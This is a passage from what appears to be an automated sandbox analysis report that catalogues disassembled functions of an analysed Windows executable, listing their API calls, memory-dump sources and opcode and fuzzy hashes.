                            • CloseHandle.KERNEL32(00000000), ref: 0043EF1A
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                            • String ID:
                            • API String ID: 2576544623-0
                            • Opcode ID: e7de3362f2db4dda5829f1656ab3b37f8f7b5c964ef14988d56b6f4f178bd31a
                            • Instruction ID: 9d074a24f9341f7d98fb052435443efbd7da82a792e2a873b71e5ffc79bd10c0
                            • Opcode Fuzzy Hash: e7de3362f2db4dda5829f1656ab3b37f8f7b5c964ef14988d56b6f4f178bd31a
                            • Instruction Fuzzy Hash: 8E516D71504315ABD311EF25C885F6BB7E8EF98710F10482DF995DB2A1EB70AD08CB96
                            Function 0041E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0041E628
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: lstrlen
                            • String ID: ($|
                            • API String ID: 1659193697-1631851259
                            • Opcode ID: c6f5e33efa34a7aecd8df87be5d86ceaca484990b0f0ada1f243ff908051be24
                            • Instruction ID: 01ed6970f5b66aca7dd518d42ee1363466e92dab96e516ccc771df9d1c318420
                            • Opcode Fuzzy Hash: c6f5e33efa34a7aecd8df87be5d86ceaca484990b0f0ada1f243ff908051be24
                            • Instruction Fuzzy Hash: DE322679A007059FD728CF1AC4819AAB7F0FF48310B55C56EE89ADB3A1D774E981CB44
                            Function 0042B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0042B343
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0042B39D
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0042B3EA
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID:
                            • API String ID: 1682464887-0
                            • Opcode ID: 6d7aca003c82af84b199cb0271ffefb7037f2fb4af05057fe8a7dc2e77be6ff6
                            • Instruction ID: b57f6e9c5fad8487171e94cc93ee80c98ef5ee0c678bf6e32243c6e8b677454b
                            • Opcode Fuzzy Hash: 6d7aca003c82af84b199cb0271ffefb7037f2fb4af05057fe8a7dc2e77be6ff6
                            • Instruction Fuzzy Hash: 2F216D35A00118EFCB00DF95D884AAEBBB8FF49314F0580AAE805EB251CB319D55CB54
                            Function 004187E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003E0DB6: std::exception::exception.LIBCMT ref: 003E0DEC
                              • Part of subcall function 003E0DB6: __CxxThrowException@8.LIBCMT ref: 003E0E01
                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041882B
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418858
                            • GetLastError.KERNEL32 ref: 00418865
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                            • String ID:
                            • API String ID: 1922334811-0
                            • Opcode ID: fa42521dad1b99043b08c6e16703e7c966df7d3831b5e0d8d23583cd54629f71
                            • Instruction ID: 41f85a7190fd95d171f03e2628f455f00e947b31b5cab16889d8c64083059547
                            • Opcode Fuzzy Hash: fa42521dad1b99043b08c6e16703e7c966df7d3831b5e0d8d23583cd54629f71
                            • Instruction Fuzzy Hash: 3B118FB2414205AFE718EFA4DC86D6BB7F8EB45710B20852EF45597241EB74BC818B64
                            Function 0041874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                            Download Yara Rule
                            APIs
                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00418774
                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0041878B
                            • FreeSid.ADVAPI32(?), ref: 0041879B
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AllocateCheckFreeInitializeMembershipToken
                            • String ID:
                            • API String ID: 3429775523-0
                            • Opcode ID: f11cf77060a22bdb34a33eb336874133b6b195819bc8f8ba3193b9f198870b88
                            • Instruction ID: 0888dad38eef5b663d8b013d76258fb253da82137d4c074c865e7c12ba4be099
                            • Opcode Fuzzy Hash: f11cf77060a22bdb34a33eb336874133b6b195819bc8f8ba3193b9f198870b88
                            • Instruction Fuzzy Hash: EFF04F7991130CBFDF00DFF4DC89AAEB7BCEF09201F104479A501E2181D6756A488B54
                            Function 00428889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            • __time64.LIBCMT ref: 0042889B
                              • Part of subcall function 003E520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00428F6E,00000000,?,?,?,?,0042911F,00000000,?), ref: 003E5213
                              • Part of subcall function 003E520A: __aulldiv.LIBCMT ref: 003E5233
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Time$FileSystem__aulldiv__time64
                            • String ID: 0eH
                            • API String ID: 2893107130-3148311234
                            • Opcode ID: e5b24e73684987632aff9c2ef036e77526fbe5bdc80953f18344bf405f313489
                            • Instruction ID: 3643ff2868afba8cffc9854a211169357743f4d1af6da3a1b2a8f7a513ff9982
                            • Opcode Fuzzy Hash: e5b24e73684987632aff9c2ef036e77526fbe5bdc80953f18344bf405f313489
                            • Instruction Fuzzy Hash: 4D21D5326255208BC329CF29E441A56B3E1EFA5311F698E6DD1F5CB2C0CA34B905CB58
                            Function 0042C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 0042C6FB
                            • FindClose.KERNEL32(00000000), ref: 0042C72B
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 76e470170045882f5431d6061474033b47ca2e0cb3e70b70598f361a72a126dc
                            • Instruction ID: 5a289c3cd77222fc4beb83fe749f6cc79f80523c43575632192d4be583d79891
                            • Opcode Fuzzy Hash: 76e470170045882f5431d6061474033b47ca2e0cb3e70b70598f361a72a126dc
                            • Instruction Fuzzy Hash: FD118E766006009FDB10DF29D889A2AF7E9FF85324F01851EF9A9CB291DB34AC05CB85
                            Function 0042A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00439468,?,0044FB84,?), ref: 0042A097
                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00439468,?,0044FB84,?), ref: 0042A0A9
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorFormatLastMessage
                            • String ID:
                            • API String ID: 3479602957-0
                            • Opcode ID: 664d1cfbe4b704d5b19378af50835d8344472ce5cfe4080fc1a2ed5ebbc834bc
                            • Instruction ID: dfd027775a3eb5a1ac6dcec40ffa619d82c8665bf6025698eaf522d74bc4dcde
                            • Opcode Fuzzy Hash: 664d1cfbe4b704d5b19378af50835d8344472ce5cfe4080fc1a2ed5ebbc834bc
                            • Instruction Fuzzy Hash: 76F0E23520422DABDB219FA4DC48FEA736CBF09361F008266FD09D6181C6709904CBE1
                            Function 004181CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00418309), ref: 004181E0
                            • CloseHandle.KERNEL32(?), ref: 004181F2
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AdjustCloseHandlePrivilegesToken
                            • String ID:
                            • API String ID: 81990902-0
                            • Opcode ID: dcee959e62be2933b356a643c2cf6b74ae4247558c40862f4f926d3435eaa895
                            • Instruction ID: 2609a843bb446d4e872b20c2ec0d9670e005b3bab0115f6b668184c78eb01b5c
                            • Opcode Fuzzy Hash: dcee959e62be2933b356a643c2cf6b74ae4247558c40862f4f926d3435eaa895
                            • Instruction Fuzzy Hash: 92E0EC76010A20AFE7262B61EC09D777BEAEF44310714893DF8A684470DB62ACD1DB14
                            Function 003EA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 003EA15A
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 003EA163
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 77962d20c8b6ced94930208afe6334443e639ec9fdd71e3062054dc17f8ef0f3
                            • Instruction ID: 1aeab84b04b5fd839ea3c868517153fc16cdcb227ff799a0a3a830f765568ef9
                            • Opcode Fuzzy Hash: 77962d20c8b6ced94930208afe6334443e639ec9fdd71e3062054dc17f8ef0f3
                            • Instruction Fuzzy Hash: 66B09235054208ABCA002F91EC09F883F68EB46AA2F404030FA0D84C60CB6254548A99
                            Function 003EF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5ba867dc5908e51850c2dba9fca7cc999720a858f8598ad75abdb1eea8295b4d
                            • Instruction ID: 3f8e748518c162c65bc2c05e81d3d3d8448d93e1514e2f2606a58e25435fb28d
                            • Opcode Fuzzy Hash: 5ba867dc5908e51850c2dba9fca7cc999720a858f8598ad75abdb1eea8295b4d
                            • Instruction Fuzzy Hash: D7323322D29F514DD7239635D832336A289AFB73C9F15D737F81AB5AA6EB28D4C34100
                            Function 003F242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8966bd46f420c932b9f7b3472af0bb5d073790ef7db76b71e2ab6c535d499fba
                            • Instruction ID: b17761c85f13bb56fb35b5f5a5a4db186f906f8321df84e8a24638795ba94ac2
                            • Opcode Fuzzy Hash: 8966bd46f420c932b9f7b3472af0bb5d073790ef7db76b71e2ab6c535d499fba
                            • Instruction Fuzzy Hash: 44B1E130D2AF414DD72396398831336BA5CAFBB2DAF51D72BFC2674D22EB2185934145
                            Function 00424C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00424C76
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: mouse_event
                            • String ID:
                            • API String ID: 2434400541-0
                            • Opcode ID: 1f1f2d3bbf6788171d308dbbb8122eafba4d6ffd1e2d9051535ccd942a64fd81
                            • Instruction ID: 7b44eee45855bf474fd11c13f8ecf7d866c5b0b4afeb9879e8f8d16e5d1cc48b
                            • Opcode Fuzzy Hash: 1f1f2d3bbf6788171d308dbbb8122eafba4d6ffd1e2d9051535ccd942a64fd81
                            • Instruction Fuzzy Hash: B7D05EE432223838ECA8072ABD4FF7B1109E3C0781FC6814B7241852C1E8ECA801A43D
                            Function 004187B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00418389), ref: 004187D1
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LogonUser
                            • String ID:
                            • API String ID: 1244722697-0
                            • Opcode ID: ff99b4915eabc9d7da4ae255c476a8261eb06a4f65b9f482d129470c0b9baae9
                            • Instruction ID: 0dd2ee3cc3403344901c45e9f300edea8f41616e7e90e340230429f988243dab
                            • Opcode Fuzzy Hash: ff99b4915eabc9d7da4ae255c476a8261eb06a4f65b9f482d129470c0b9baae9
                            • Instruction Fuzzy Hash: 10D05E3226050EABEF018FA4DC01EAF3B69EB04B01F408121FE15C50A1C775E835AB60
                            Function 003EA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 003EA12A
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 5b79e5f16539005ca6f2e2dd822131ff944de671a3087a0b0774ce6b5f170503
                            • Instruction ID: df80e3107798cdff587a22040c6d7fcb33ce2726dde4bcd2ec988817b87a85b6
                            • Opcode Fuzzy Hash: 5b79e5f16539005ca6f2e2dd822131ff944de671a3087a0b0774ce6b5f170503
                            • Instruction Fuzzy Hash: 8CA0113000020CAB8A002F82EC08888BFACEA02AA0B008030F80C808228B32A8208A88
                            Function 003D8808 Relevance: .6, Instructions: 590COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2877b3e01a486dda242231f015fe812202a9c35dec0712f5812a3c150ec1370e
                            • Instruction ID: 13edb84cc4353ef5246dca3204fedc326656bb5f6f67975601cdcf7fcf24560a
                            • Opcode Fuzzy Hash: 2877b3e01a486dda242231f015fe812202a9c35dec0712f5812a3c150ec1370e
                            • Instruction Fuzzy Hash: F0225832904106CBDF3A8B64E0A43FD77A1FB80304F69806BD9868B792DB74EDD2C645
                            Function 003E21C5 Relevance: .3, Instructions: 345COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction ID: 2275bf601891127b33493d1aa1b62b4a19d98655a0e91a1eee71eff8ed1b2f35
                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction Fuzzy Hash: B0C15C362051F30ADB6E463B883407FFAA55EA27B131B076DD8B2CB5D4EE20C965D620
                            Function 003E25FA Relevance: .3, Instructions: 341COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction ID: ffab9fcc5ebce08c763f27860adb1193023b28c3487f66e76d3b5092a985754d
                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction Fuzzy Hash: 34C16F322051F30ADB2E463B883417FBAA55EA27B131B176DE4B2DB1D5EE20C9759620
                            Function 003E1978 Relevance: .3, Instructions: 323COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction ID: f9fd6b34606f56bb96b4bfebb27f4b5daf5de4fc5e5b9fa0780e121def3e1a48
                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction Fuzzy Hash: 33C16D322091F30ADF2E463B887417FBAA15EA27B131B076DD4B3DB1D5EE70C9659620
                            Function 00437806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                            Download Yara Rule
                            APIs
